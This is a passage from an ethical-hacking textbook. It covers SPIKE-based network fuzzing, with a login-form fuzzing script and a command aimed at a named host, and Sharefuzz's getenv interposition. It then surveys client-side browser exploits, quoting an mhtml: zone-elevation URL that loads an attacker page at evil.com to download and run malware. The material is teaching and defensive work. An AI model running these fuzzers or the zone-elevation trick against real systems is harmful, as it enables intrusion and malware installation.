keywords and tag values, while dynamic protocol content generally consists of user-supplied
values. How do you deal with situations in which an application is using a proprietary
protocol whose specifications you don’t have access to? In this case, you must
reverse-engineer the protocol to some degree if you hope to develop a useful fuzzer. The
goals of the reverse-engineering effort should be similar to your goals in reading an RFC:
identifying static versus dynamic protocol fields. Without resorting to reverse-engineering
a program binary, one of the few ways you can hope to learn about an unknown protocol
is by observing communications to and from the program. Network sniffing tools
might be very helpful in this regard. The Wireshark network monitoring tool, for example,
can capture all traffic to and from an application and display it in such a way as to
isolate the application layer data that you want to focus on. Initial development of a
fuzzer for a new protocol might simply build a fuzzer that can mimic a valid transaction
that you have observed. As protocol discovery progresses, the fuzzer is modified to preserve
known static fields while attempting to mangle known dynamic fields. The most
difficult challenges are faced when a protocol contains dependencies among fields. In
such cases, changing only one field is likely to result in an invalid message being sent
from the fuzzer to the server. A common example of such dependencies is embedded
length fields as seen in this simple HTTP POST request:
POST /cgi-bin/login.pl HTTP/1.1
Host: gimme.money.com
Connection: close
User-Agent: Mozilla/6.0
Content-Length: 29
Content-Type: application/x-www-form-urlencoded

user=smith&password=smithpass
In this case, if you want to fuzz the user field, then each time you change the length of
the user value, you must be sure to update the length value associated with the
Content-Length header. This somewhat complicates fuzzer development, but it must be properly
handled so that your messages are not rejected outright by the server simply for violating
the expected protocol.
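A hand-built fuzzer can keep the dependent field correct by formatting the body first and deriving Content-Length from it. The following is a minimal sketch of that idea; build_post is a hypothetical helper, and the fixed 1024-byte body buffer is an arbitrary choice for the illustration.

```c
#include <stdio.h>

/* Build the login POST request, computing Content-Length from the body.
 * Returns the request length, or -1 if a buffer is too small. */
int build_post(char *out, size_t out_size,
               const char *user, const char *password) {
    char body[1024];
    int n;
    int body_len = snprintf(body, sizeof(body),
                            "user=%s&password=%s", user, password);
    if (body_len < 0 || (size_t)body_len >= sizeof(body)) return -1;

    n = snprintf(out, out_size,
        "POST /cgi-bin/login.pl HTTP/1.1\r\n"
        "Host: gimme.money.com\r\n"
        "Connection: close\r\n"
        "User-Agent: Mozilla/6.0\r\n"
        "Content-Length: %d\r\n"   /* always derived, never hard-coded */
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "\r\n"
        "%s", body_len, body);
    return (n < 0 || (size_t)n >= out_size) ? -1 : n;
}
```

With the values smith and smithpass the helper emits Content-Length: 29, matching the request shown above; a 10-character user value changes it to 34.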
SPIKE
SPIKE is a fuzzer creation toolkit/API developed by Dave Aitel of Immunity, Inc. SPIKE
provides a library of C functions for use by fuzzer developers. Only Dave would call SPIKE
pretty, but it was one of the early efforts to simplify fuzzer development by providing
buffer construction primitives useful in many fuzzing situations. SPIKE is designed to
assist in the creation of network-oriented fuzzers and supports sending data via TCP or
UDP. Additionally, SPIKE provides several example fuzzers for protocols ranging from
HTTP to Microsoft Remote Procedure Call (MSRPC). SPIKE libraries can be used to form
the foundation of custom fuzzers, or SPIKE’s scripting capabilities can be used to rapidly
develop fuzzers without requiring detailed knowledge of C programming.
The SPIKE API centers on the notion of a “spike” data structure. Various API calls are
used to push data into a spike and ultimately send the spike to the application being
fuzzed. Spikes can contain static data, dynamic fuzzing variables, dynamic length values,
and grouping structures called blocks. A SPIKE “block” is used to mark the beginning
and end of data whose length should be computed. Blocks and their associated length
fields are created with name tags. Prior to sending a spike, the SPIKE API handles all of
the details of computing block lengths and updating the corresponding length field for
each defined block. SPIKE cleanly handles nested blocks.
We will review some of the SPIKE API calls here. The API is not covered in sufficient
detail to allow creation of stand-alone fuzzers, but the functions described can easily be
used to build a SPIKE script. Most of the available functions are declared (though not
necessarily described) in the file spike.h. Execution of a SPIKE script will be described
later in the chapter.
Spike Creation Primitives
When developing a stand-alone fuzzer, you will need to create a spike data structure into
which you will add content. All of the SPIKE content manipulation functions act on the
“current” spike data structure as specified by the set_spike() function. When creating
SPIKE scripts, these functions are not required, as they are automatically invoked by the
script execution engine.
• struct spike *new_spike() Allocate a new spike data structure.
• int spike_free(struct spike *old_spike) Release the indicated
spike.
• int set_spike(struct spike *newspike) Make newspike the current
spike. All future calls to data manipulation functions will apply to this spike.
SPIKE Static Content Primitives
None of these functions requires a spike as a parameter; they all operate on the current
spike as set with set_spike.
• s_string(char *instring) Insert a static string into a spike.
• s_binary(char *instring) Parse the provided string as hexadecimal
digits and add the corresponding bytes into the spike.
• s_bigword(unsigned int aword) Insert a big-endian word into the
spike. Inserts 4 bytes of binary data into the spike.
• s_xdr_string(unsigned char *astring) Insert the 4-byte length of
astring followed by the characters of astring into the spike. This function
generates the XDR representation of astring.
NOTE XDR is the External Data Representation standard, which describes
a standard way in which to encode various types of data such as integers,
floating-point numbers, and strings.
• s_binary_repeat(char *instring, int n) Add n sequential instances
of the binary data represented by the string instring into the spike.
• s_string_repeat(char *instring, int n) Add n sequential instances
of the string instring into the spike.
• s_intelword(unsigned int aword) Add 4 bytes of little-endian binary
data into the spike.
• s_intelhalfword(unsigned short ashort) Add 2 bytes of little-endian
binary data into the spike.
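To make the byte layouts concrete, the sketch below encodes a string the way the XDR standard describes (a 4-byte big-endian length, the characters, then zero padding to a multiple of 4 bytes) and stores a 32-bit value in little-endian order. These are stand-alone illustrations with hypothetical names, not SPIKE's own code, and whether s_xdr_string pads in exactly this way is not confirmed here.

```c
#include <stdint.h>
#include <string.h>

/* Encode s as an XDR string: 4-byte big-endian length, the bytes of s,
 * then zero padding up to a multiple of 4 bytes.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t xdr_encode_string(unsigned char *out, size_t out_size, const char *s) {
    size_t len = strlen(s);
    size_t padded = (len + 3) & ~(size_t)3;
    if (out_size < 4 || padded > out_size - 4) return 0;
    out[0] = (unsigned char)((len >> 24) & 0xff);
    out[1] = (unsigned char)((len >> 16) & 0xff);
    out[2] = (unsigned char)((len >> 8) & 0xff);
    out[3] = (unsigned char)(len & 0xff);
    memcpy(out + 4, s, len);
    memset(out + 4 + len, 0, padded - len);
    return 4 + padded;
}

/* Store a 32-bit value least significant byte first (Intel order). */
void store_le32(unsigned char out[4], uint32_t v) {
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}
```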
SPIKE Block Handling Primitives
The following functions are used to define blocks and insert placeholders for block
length values. Length values are filled in prior to sending the spike, once all fuzzing variables
have been set.
• int s_block_start(char *blockname) Start a named block. No new
content is added to the spike. All content added subsequently up to the
matching s_block_end call is considered part of the named block and contributes
to the block’s length.
• int s_block_end(char *blockname) End the named block. No new
content is added to the spike. This marks the end of the named block for length
computation purposes.
Block lengths may be specified in many different ways depending on the protocol
being used. In HTTP, a block length may be specified as an ASCII string, while binary
protocols may specify block lengths using big- or little-endian integers. SPIKE provides a
number of block length insertion functions covering many different formats.
• int s_binary_block_size_word_bigendian(char
*blockname) Inserts a 4-byte big-endian placeholder to receive the length
of the named block prior to sending the spike.
• int s_binary_block_size_halfword_bigendian(char
*blockname) Inserts a 2-byte big-endian block size placeholder.
• int s_binary_block_size_intel_word(char *blockname) Inserts
a 4-byte little-endian block size placeholder.
• int s_binary_block_size_intel_halfword(char
*blockname) Inserts a 2-byte little-endian block size placeholder.
• int s_binary_block_size_byte(char *blockname) Inserts a 1-byte
block size placeholder.
• int s_blocksize_string(char *blockname, int n) Inserts an n
character block size placeholder. The block length will be formatted as an ASCII
decimal integer.
• int s_blocksize_asciihex(char *blockname) Inserts an 8-character
block size placeholder. The block length will be formatted as an ASCII hex
integer.
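The difference between these formats is easiest to see by encoding one length several ways. The sketch below writes the value 29 as a 4-byte big-endian word, a 2-byte little-endian halfword, and a fixed-width ASCII decimal string. The function names are hypothetical, and the zero padding of the ASCII form is an assumption made for this illustration; it is not taken from the SPIKE source.

```c
#include <stdint.h>
#include <stdio.h>

/* 4-byte big-endian length, most significant byte first. */
void len_as_be32(unsigned char out[4], uint32_t len) {
    out[0] = (unsigned char)((len >> 24) & 0xff);
    out[1] = (unsigned char)((len >> 16) & 0xff);
    out[2] = (unsigned char)((len >> 8) & 0xff);
    out[3] = (unsigned char)(len & 0xff);
}

/* 2-byte little-endian length, least significant byte first. */
void len_as_le16(unsigned char out[2], uint16_t len) {
    out[0] = (unsigned char)(len & 0xff);
    out[1] = (unsigned char)((len >> 8) & 0xff);
}

/* ASCII decimal length, zero padded to exactly width characters
 * (padding style assumed). Returns 0 on success, -1 if it does not fit. */
int len_as_ascii_dec(char *out, size_t out_size, int width, uint32_t len) {
    int n = snprintf(out, out_size, "%0*lu", width, (unsigned long)len);
    return (n == width && (size_t)n < out_size) ? 0 : -1;
}
```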
SPIKE Fuzzing Variable Declaration
The last function required for developing a SPIKE-based fuzzer provides for declaring
fuzzing variables. A fuzzing variable is a string that SPIKE will manipulate in some way
between successive transmissions of a spike.
• void s_string_variable(unsigned char *variable) Insert an
ASCII string that SPIKE will change each time a new spike is sent.
When a spike contains more than one fuzzing variable, an iteration process is usually
used to modify each variable in succession until every possible combination of the variables
has been generated and sent.
SPIKE Script Parsing
SPIKE offers a limited scripting capability. SPIKE statements can be placed in a text file
and executed from within another SPIKE-based program. All of the work for executing
scripts is accomplished by a single function.
• int s_parse(char *filename) Parse and execute the named file as a
SPIKE script.
A Simple SPIKE Example
Consider the HTTP post request we looked at earlier:
POST /cgi-bin/login.pl HTTP/1.1
Host: gimme.money.com
Connection: close
User-Agent: Mozilla/6.0
Content-Length: 29
Content-Type: application/x-www-form-urlencoded

user=smith&password=smithpass
The following sequence of SPIKE calls would generate valid HTTP requests while fuzzing
the user and password fields in the request:
s_string("POST /cgi-bin/login.pl HTTP/1.1\r\n");
s_string("Host: gimme.money.com\r\n");
s_string("Connection: close\r\n");
s_string("User-Agent: Mozilla/6.0\r\n");
s_string("Content-Length: ");
s_blocksize_string("post_args", 7);
s_string("\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n");
s_block_start("post_args");
s_string("user=");
s_string_variable("smith");
s_string("&password=");
s_string_variable("smithpass");
s_block_end("post_args");
These statements constitute a valid SPIKE script (we refer to this script as demo.spk).
All that is needed now is a way to execute these statements. Fortunately, the SPIKE distribution
comes with a simple program called generic_send_tcp that takes care of the
details of initializing a spike, parsing a script into the spike, and iterating through all
fuzzing variables in the spike. Five arguments are required to run generic_send_tcp: the
host to be fuzzed, the port to be fuzzed, the filename of the spike script, information on
whether any fuzzing variables should be skipped, and whether any states of each fuzzing
variable should be skipped. These last two values allow you to jump into the middle of a
fuzzing session, but for our purposes, set them to zero to indicate that you want all variables
fuzzed and every possible value used for each variable. Thus the following command
line would cause demo.spk to be executed:
# ./generic_send_tcp gimme.money.com 80 demo.spk 0 0
If the web server at gimme.money.com had difficulty parsing the strings thrown at it
in the user and password fields, then you might expect generic_send_tcp to report errors
encountered while reading or writing to the socket connecting to the remote site.
If you’re interested in learning more about writing SPIKE-based fuzzers, you should read
through and understand generic_send_tcp.c. It uses all of the basic SPIKE API calls in order
to provide a nice wrapper around SPIKE scripts. More detailed information on the SPIKE
API itself can only be found by reading through the spike.h and spike.c source files.
SPIKE Proxy
SPIKE Proxy is another fuzzing tool, developed by Dave Aitel, that performs fuzzing of
web-based applications. The tool sets itself up as a proxy between you and the website or
application you want to fuzz. By configuring a web browser to proxy through SPIKE
Proxy, you interact with SPIKE Proxy to help it learn some basic information about the
site being fuzzed. SPIKE Proxy takes care of all the fuzzing and is capable of performing
attacks such as SQL injection and cross-site scripting. SPIKE Proxy is written in Python
and can be tailored to suit your needs.
Sharefuzz
Also authored by Dave Aitel, Sharefuzz is a fuzzing library designed to fuzz set user ID
(SUID) root binaries.
NOTE A SUID binary is a program that has been granted permission to run
as a user other than the user that invokes the program. The classic example is
the passwd program, which must run as root in order to modify the system
password database.
Vulnerable SUID root binaries can provide an easy means for local privilege escalation
attacks. Sharefuzz operates by taking advantage of the LD_PRELOAD mechanism
on Unix systems. By inserting itself as a replacement for the getenv library function,
Sharefuzz intercepts all environment variable requests and returns a long string rather
than the actual environment variable value. Figure 14-4 shows a standard call to the
getenv library function, while Figure 14-5 shows the results of a call to getenv once the
program has been loaded with Sharefuzz in place. The goal is to locate binaries that fail
to properly handle unexpected environment string values.
Figure 14-4 Normal call to getenv using libc
Figure 14-5 Fuzzed call to getenv with Sharefuzz in place
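The interposition idea can be sketched in a few lines of C. This is not Sharefuzz's actual source; it is a minimal illustration under stated assumptions, in which FUZZ_LEN, fuzzed_getenv, and the BUILD_AS_PRELOAD macro are hypothetical names. The replacement ignores the requested variable name and always returns a long run of 'A' characters.

```c
#include <stddef.h>
#include <string.h>

#define FUZZ_LEN 4096  /* assumed length; chosen only for illustration */

/* Ignore the requested name and hand back a long string of 'A's. */
char *fuzzed_getenv(const char *name) {
    static char fuzz[FUZZ_LEN + 1];
    (void)name;                    /* every variable gets the same value */
    memset(fuzz, 'A', FUZZ_LEN);
    fuzz[FUZZ_LEN] = '\0';
    return fuzz;
}

#ifdef BUILD_AS_PRELOAD
/* Only when built as a shared object: shadow the libc getenv so that
 * the target program's calls land here instead. */
char *getenv(const char *name) {
    return fuzzed_getenv(name);
}
#endif
```

Assuming the file is saved as fuzzenv.c, it could be built with gcc -shared -fPIC -DBUILD_AS_PRELOAD -o fuzzenv.so fuzzenv.c and then named in the LD_PRELOAD environment variable before launching the program under test.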
Reference
SPIKE, SPIKE Proxy, Sharefuzz www.immunitysec.com/resources-freesoftware.shtml
CHAPTER 15 Client-Side Browser Exploits
In this chapter, you will learn about client-side vulnerabilities and several tools for
discovering client-side vulnerabilities. This chapter mostly focuses on vulnerabilities
affecting Internet Explorer on the Microsoft Windows platform, but the concepts can
be extended to other classes of client-side vulnerabilities and other platforms where
client-side applications run.
• Why client-side vulnerabilities are interesting
• Internet Explorer security concepts
• Notable client-side exploits in recent history
• Finding new browser-based vulnerabilities with MangleMe, AxEnum, and AxMan
• Heap spray to exploit
• Protecting yourself from client-side exploits
Why Client-Side Vulnerabilities Are Interesting
Client-side vulnerabilities are vulnerabilities in client software such as web browsers, email
applications, and media players. At first, you might not think that these vulnerabilities
are very interesting. After all, wouldn’t an attacker have to get access to your client
workstation in order to target vulnerabilities in your client software? The firewall should
protect you from those attacks, right? Oh, and your corporation uses a proxy server to
protect against web attacks, so that is double protection! And it’s not like the attack
could take over the system either, right? It’s just a web browser…
This section addresses those misconceptions.
Client-Side Vulnerabilities Bypass Firewall Protections
With more and more computers protected from attack by a host-based or perimeter
firewall, attackers have changed tactics. The fire-and-forget attacks of 2003 are now
blocked by on-by-default firewalls. This change makes client-side vulnerabilities more
interesting to the attacker.
If you recall, firewalls typically block new, inbound connection attempts but allow
users behind the firewall to create outbound connections, which allow both parties of
that established connection to communicate freely in both directions over that channel.
If an attacker wants to attack your firewall-protected computer, he will normally be
blocked by your firewall. However, if the attacker instead hosts the domain evil.com and
entices you to browse to www.evil.com, he now has a communication channel to interact
with your computer. The universe of attack possibilities is limited for this attacker,
however. He needs to find a vulnerability either in the browser or in a component that
the browser uses to display web content. If the attacker finds such a vulnerability, the
firewall is no longer relevant. Your established connection to www.evil.com allows the
attacker to present an attack over this connection.
Client-Side Applications Are Often Running
with Administrative Privileges
Client-side vulnerabilities exploited for code execution result in attack code executing at
the same privilege level as the client-side application executes normally. Contrast this
with attacks such as Blaster or Slammer, which targeted system services running at a high
privilege level (typically LocalSystem). However, do not be fooled into thinking that
client-side vulnerabilities are less dangerous than system service exploits. Many users log
onto their workstation as a user in the local administrators group. If the users are logged
in as an administrator, their Internet Explorer or Outlook session is also running as an
administrator. Successful client-side exploits targeting that Internet Explorer or Outlook
session also would run with administrative privileges. This gives all the same rights as an
attack against a system level service: administrators can install rootkits and key loggers,
install and start services, and access LSA secrets. With these rights, the attacker can also cover
his tracks in the event log. If victims log on as an administrator, they are vulnerable to
potential “browse-and-you’re-owned” exploits.
NOTE Windows Vista introduced several new features to help client-side
applications not run with full administrative privileges. Internet Explorer
Protected Mode and Vista’s User Account Control are useful defense-in-depth
features to help users run at a lower privilege level. For more detail on how to
run at a lower privilege level on down-level Windows platforms, see the “Run
Internet-Facing Applications with Reduced Privileges” section later in this chapter.
Client-Side Vulnerabilities Can Easily Target Specific
People or Organizations
For attackers earning 20 cents per adware install, it doesn’t matter who is targeted by the
attack; they earn the same 20 cents regardless of the victim. However, some attackers
are interested in targeting specific victims or victims belonging to a specific group, company,
or organization. You don’t hear it in the news much, but corporations and nation-states
are being targeted today by client-side attacks with the intent of industrial espionage
and stealing secrets. This is sometimes referred to as spear phishing.
NOTE More information on spear phishing can be found at the following
URLs:
www.microsoft.com/athome/security/email/spear_phishing.mspx
www.pcworld.com/article/id,122497-page,1/article.html
Client-side vulnerabilities are especially effective in spear phishing attacks because an
attacker can easily choose a set of “targets” (people) and deliver a lure to them via e-mail
without knowing anything about their target network configuration. Attackers build
sophisticated, convincing e-mails that appear to be from a trusted associate. Victims click
on a link in the e-mail and end up at evil.com with the attacker serving up malicious web
content from an attack web server to the victim’s workstation. If an attacker has found a
client-side vulnerability in the victim’s browser or a component used by the browser, she
can then run code on any specific person’s computer whose e-mail is known.
Internet Explorer Security Concepts
To understand how these attacks work, it’s important to understand the components
and concepts Internet Explorer uses for a rich and engaging browsing experience. The
two most important ideas to understand are ActiveX controls and Internet Explorer
security zones.
ActiveX Controls
Microsoft added ActiveX support to Internet Explorer to give developers the opportunity
to extend the browsing experience. These “controls” are just small programs written to
be run from within a container, usually Internet Explorer. ActiveX controls can do just
about anything that the user running them can do, including access the registry or modify
the file system. Yikes! Before Internet Explorer will install and run an ActiveX control,
however, it presents a security warning to the user along with a digital signature from the
control’s developer. The user then makes a trust decision based on the developer, the
name of the control, and the digital signature. The danger comes when a control is
marked as safe to be scripted by anyone, is signed by a trustworthy corporation, and has
a security vulnerability. When a bad guy finds this vulnerability, he can host a copy of
the ActiveX control on his evil.com web server, build HTML code to instantiate the
ActiveX control, and then lure an unsuspecting user to browse to the web page and
accept the security dialog box. As an example of how ActiveX controls work, the text
below is HTML that instantiates the Adobe Flash ActiveX control to play a movie.
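<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
<param name="movie" value="http://www.apple.com/appletv/media/connect.swf">
</object>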
Chapter 15: Client-Side Browser Exploits
361
You can interpret the preceding blob of HTML by breaking it down into the following
components:
• I want to load an object having the identifier
D27CDB6E-AE6D-11cf-96B8-444553540000. If it’s already installed, information
about where it is installed can be found in the registry under
HKCR\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}.
• If the control is not yet installed, I want to download it from
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab.
• I need version 6.0.40.0 or higher. If my version is less than 6.0.40.0, I want to
download http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
and use that object instead of the object I already have installed.
• This object takes a parameter named movie. The value to pass to this parameter
is “http://www.apple.com/appletv/media/connect.swf”.
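The same breakdown can be done mechanically. The following is a minimal Python sketch, not part of the original example: the SAMPLE tag is rebuilt from the values in the list above, and the names ObjectTagParser and describe_object are hypothetical helpers introduced only for illustration.

```python
from html.parser import HTMLParser


class ObjectTagParser(HTMLParser):
    """Collect the attributes of an <object> tag and its <param> children."""

    def __init__(self):
        super().__init__()
        self.object_attrs = {}
        self.params = {}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "object":
            self.object_attrs = attrs
        elif tag == "param":
            self.params[attrs.get("name")] = attrs.get("value")


def describe_object(html):
    """Return the CLSID, download URL, minimum version, and parameters."""
    parser = ObjectTagParser()
    parser.feed(html)
    classid = parser.object_attrs.get("classid", "")
    codebase = parser.object_attrs.get("codebase", "")
    # Everything after '#version=' is the minimum version the page asks for.
    url, _, version = codebase.partition("#version=")
    return {
        "clsid": classid.split(":", 1)[-1],
        "download_url": url,
        "min_version": tuple(int(p) for p in version.split(",")) if version else None,
        "params": parser.params,
    }


# Tag rebuilt from the values listed in the text (an assumption of this sketch).
SAMPLE = (
    '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" '
    'codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/'
    'swflash.cab#version=6,0,40,0">'
    '<param name="movie" '
    'value="http://www.apple.com/appletv/media/connect.swf">'
    '</object>'
)

info = describe_object(SAMPLE)
for key, value in info.items():
    print(key, "=", value)
```

Note that everything the sketch extracts (which control to load, where to fetch it from, and what parameters to pass) is chosen by whoever wrote the page, which is exactly what an attacker hosting the tag controls.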
There are some very interesting security implications here when you think about an
attacker hosting an object tag and luring an unsophisticated user to the website. Chew
on that for a while and we’ll discuss abusing the design factors of ActiveX controls later
in the chapter.
Internet Explorer Security Zones
One more piece of background knowledge you need to understand client-side browser
exploits is the idea of Internet Explorer security zones. Assigning websites to different
“zones” gives you the flexibility to trust some websites more than others. For example,
you might choose to trust your corporate web server and allow it to run Java applications
while refusing to run Java applications from web servers on the Internet. The four built-in
IE security zones are, from least permissive to most permissive, Restricted Sites, Internet,
Intranet, and Trusted Sites. You can read about the default security settings for each
zone and how IE decides which zone a URL should be loaded in at
http://msdn2.microsoft.com/en-us/library/ms537183.aspx. There’s also one implicit security zone
called the Local Machine zone.
As you might guess, web pages loaded in the most restrictive Restricted Sites zone are
locked down. They are not allowed to load ActiveX controls or even to run JavaScript.
One important use for this zone is viewing the least trusted content of all—e-mail. Outlook
uses the guts of Internet Explorer to view HTML-based e-mail and it loads content
in the Restricted Sites zone, so viewing in the Outlook preview pane is fairly safe. The
trust level increases and security restrictions are relaxed as you progress
along the zone list. Scripting and safe-for-scripting ActiveX controls are allowed in the
Internet zone but IE won’t pass NTLM authentication credentials. Sites loaded in the
Intranet zone are assumed to have some level of trust, and some security restrictions
are relaxed, enabling Intranet line-of-business applications to work. The Local Machine
zone (LMZ) is where things get really interesting to the attacker, though.
Gray Hat Hacking: The Ethical Hacker’s Handbook
362
Before Windows XP Service Pack 2, web pages loaded in the LMZ could run unsigned
or unsafe ActiveX controls, could run Java applets without prompt, and could run all
kinds of super dangerous stuff that attackers would love to be able to do from their attack
web page. It was basically trivial for attackers to install malware onto a victim workstation
if they could get their web page loaded in the LMZ. These attacks were called zone elevation
attacks, and their goal was to jump cross-zone (from the Internet zone to the Local
Machine zone, for instance) to run scripts with fewer security restrictions. As we look next
at real-world client-side attack examples, you will understand why attackers would try so
hard and jump through so many hoops to get an attack web page loaded in the LMZ.
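To make the payoff of a zone elevation concrete, here is a small Python sketch that models only the pre-SP2 capabilities this section describes. It is a toy model, not IE's real policy engine: the capability labels and the gained_by_elevation helper are hypothetical, only three zones are modeled, and it assumes that the Local Machine zone also allowed everything the Internet zone allowed.

```python
# Capabilities named in the text; the string labels are hypothetical.
SCRIPT = "run script"
SAFE_ACTIVEX = "load safe-for-scripting ActiveX"
UNSAFE_ACTIVEX = "load unsigned or unsafe ActiveX"
JAVA_NO_PROMPT = "run Java applets without prompt"

# Pre-XP SP2 behavior as summarized in the text, for three zones only.
PRE_SP2_POLICY = {
    "Restricted Sites": frozenset(),
    "Internet": frozenset({SCRIPT, SAFE_ACTIVEX}),
    # Assumption: the LMZ permits everything the Internet zone does, plus more.
    "Local Machine": frozenset(
        {SCRIPT, SAFE_ACTIVEX, UNSAFE_ACTIVEX, JAVA_NO_PROMPT}
    ),
}


def gained_by_elevation(source_zone, target_zone, policy=PRE_SP2_POLICY):
    """Return the capabilities a page gains by moving between zones."""
    return policy[target_zone] - policy[source_zone]


gained = gained_by_elevation("Internet", "Local Machine")
for capability in sorted(gained):
    print(capability)
```

The set difference is the attacker's motivation in miniature: a page that jumps from the Internet zone to the Local Machine zone picks up precisely the dangerous capabilities that the Internet zone withholds.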
References
Security changes in XP SP2 www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2brows.mspx
Description of IE security zones http://msdn2.microsoft.com/en-us/library/ms537183.aspx
History of Client-Side Exploits and Latest Trends
Client-side vulnerabilities and attacks abusing those vulnerabilities have been around
for years. In fact, one of the earliest security bulletins (MS98-011) listed in Microsoft’s
security bulletin search fixed an IE4 client-side vulnerability in JScript parsing. However,
the attacks of 1998 more often exploited vulnerabilities with direct attack vectors than
client-side vulnerabilities. On the Windows platform, client-side
vulnerabilities have become more prominent only in the last few years. In this section,
we’ll take a short trip down memory lane to look at some of the more prominent vulnerabilities
used by attackers to infect victims with malware. If you’re more interested in the
discovery of new vulnerabilities than the history of this genre of attack, feel free to skip
ahead to the next section.
Client-Side Vulnerabilities Rise to Prominence
The year 2004 brought two important changes to the landscape of software security and
malicious attacks. First, Service Pack 2 for Windows XP with its on-by-default firewall
and security-hardened system services arrived and was pushed out over Windows
Update to millions of computers, largely protecting consumers from directed attacks.
Second, cybercriminals became more aggressive, targeting consumers with malware
downloads. An entire industry sprang up offering a malware “pay-per-install” business
model and didn’t ask any questions about how their “software” got installed. With
money as an incentive and firewalls as a barrier, malicious criminals turned their attention
to client-side attacks.
One interesting way to observe the growth of client-side vulnerabilities is to look at
the proportion of Microsoft security bulletins released addressing client-side vulnerabilities
compared with other vulnerabilities. Symantec did exactly this analysis early in
2007 and published the chart seen in Figure 15-1. The light color is client-side vulnerabilities
and the dark is other vulnerabilities.
Reference
Symantec blog posting with Figure 15-1 context
www.symantec.com/enterprise/security_response/weblog/2007/02/microsoft_patch_tuesday_februa.html
Notable Vulnerabilities in the History of Client-Side Attacks
To understand the present-day threat environment from client-side attacks, it will help
to understand recent history and the set of attacks that got us here. Because of the platform’s
prevalence, we’ll again focus on vulnerabilities affecting Microsoft Windows.
MS04-013 (Used by Ibiza and then Download.Ject Attacks)
This vulnerability was a zone elevation attack that resulted in an attacker’s HTML being
loaded in the Local Machine zone (LMZ). It was also the first widespread
“browse-and-you’re-owned” attack and scared a lot of people into using Firefox. And it was the first
time Russian cybercriminals were so blatantly involved in such an organized fashion. So
it’s important to start here.
From the security zones discussion earlier, remember that web pages loaded in the
LMZ can do all sorts of dangerous stuff. The favorite LMZ trick of 2004 was to use the
ActiveX control ADODB.Stream installed by default on Windows as part of MDAC
(Microsoft Data Access Components) to download and run files from the Internet.
ADODB.Stream would only do this when run from the trusted Local Machine zone.
Figure 15-1 Proportion of Microsoft security updates addressing client-side vulnerabilities
The actual vulnerability used in the Ibiza and Download.Ject attacks was in the mhtml:
protocol handler. A protocol handler is code that handles protocols like http:, ftp:, and
rtsp:. Internet Explorer passes the URL following the protocol name to the protocol handler
to, well, handle. The mhtml: protocol URLs are of the following form:
“mhtml://<ROOT-URL>!<BODY-URL>”.
However, the mhtml: protocol handler had a critical flaw that allowed a cross-zone elevation
from the Internet zone into the LMZ. If the <ROOT-URL> was not reachable, IE would load
only the <BODY-URL>, in
the same security zone where the ROOT-URL would have been loaded if it had existed.
More concretely, imagine what would happen given the vulnerable mhtml: protocol
handler loading this URL: “mhtml:file://c:/bogus.mht!http://evil.com/evil.html”. The
attackers chose a <ROOT-URL> on the local disk that they knew would never exist. The
location could not be found, but IE still navigates to the <BODY-URL>
(http://evil.com/evil.html) and loads it in the security zone of the <ROOT-URL>, which
for a local file is the Local Machine zone. In the case of
Download.Ject, this evil.html used ADODB.Stream to download and run arbitrary files
on the computer that browsed to the web page hosting the exploit. The Download.Ject
attack further attempted to propagate itself by looking for HTML files on the compromised
system and appending attack code to the footer of every page. It was an elaborate
attack propagated by Russian cybercriminals who used it to harvest credit card numbers
and username/passwords via key loggers. The malware side of this attack was super
interesting and you can find more by reading the sites listed in the references.
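The flawed fallback described above can be simulated in a few lines of Python. This is a toy model under stated assumptions, not the real handler: split_mhtml_url, zone_of, and load_mhtml are hypothetical names, the zone mapping only distinguishes file: URLs from everything else, and the patched branch shows one plausible safer behavior rather than Microsoft's actual fix.

```python
from urllib.parse import urlparse


def split_mhtml_url(url):
    """Split 'mhtml:ROOT!BODY' into its (root, body) parts."""
    if not url.lower().startswith("mhtml:"):
        raise ValueError("not an mhtml: URL")
    rest = url[len("mhtml:"):]
    root, sep, body = rest.partition("!")
    if not sep:
        raise ValueError("missing '!' separator")
    return root, body


def zone_of(url):
    """Toy zone mapping: file: URLs are Local Machine, all others Internet."""
    return "Local Machine" if urlparse(url).scheme == "file" else "Internet"


def load_mhtml(url, reachable, patched):
    """Return (url_loaded, zone) for the simulated handler.

    reachable is a callable that says whether the root location exists.
    """
    root, body = split_mhtml_url(url)
    if reachable(root):
        return root, zone_of(root)
    # Root is missing, so the handler falls back to the body URL.
    # The vulnerable handler keeps the root's zone; the patched branch
    # (hypothetical) assigns the zone from the content actually loaded.
    zone = zone_of(body) if patched else zone_of(root)
    return body, zone


attack = "mhtml:file://c:/bogus.mht!http://evil.com/evil.html"
print(load_mhtml(attack, reachable=lambda u: False, patched=False))
print(load_mhtml(attack, reachable=lambda u: False, patched=True))
```

The only difference between the two calls is which URL the zone decision is based on, which is why no memory corruption is needed: the content comes from evil.com, but the vulnerable handler grants it the trust of a local file.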
So, a short recap of the Ibiza and Download.Ject attacks:
• An unsuspecting user browses to an untrusted page in the Internet zone.
• Attacker abuses a cross-zone vulnerability in the mhtml: protocol handler,
which causes the attacker’s HTML page to load into the Local Machine zone.
• From the Local Machine zone, the attacker uses the ADODB.Stream ActiveX
control to download and run malware.
This attack required discovery of a vulnerability in how the protocol handler worked.
There was no buffer overrun involved here, no shellcode or fancy tricks to redirect execution
flow from the assembly level.
References
Download.Ject malware story www.answers.com/topic/download-ject
http://xforce.iss.net/xforce/alerts/id/177
Ibiza Attacks www.securityfocus.com/bid/9658/exploit
Microsoft’s Download.Ject response www.microsoft.com/security/incident/download_ject.mspx?info=EXLINK
MS04-040 (IFRAME Tag Parsing Buffer Overrun)
The next client-side vulnerability that was used in widespread attacks was an HTML
parsing vulnerability in Internet Explorer. Michal Zalewski in October 2004 wrote an
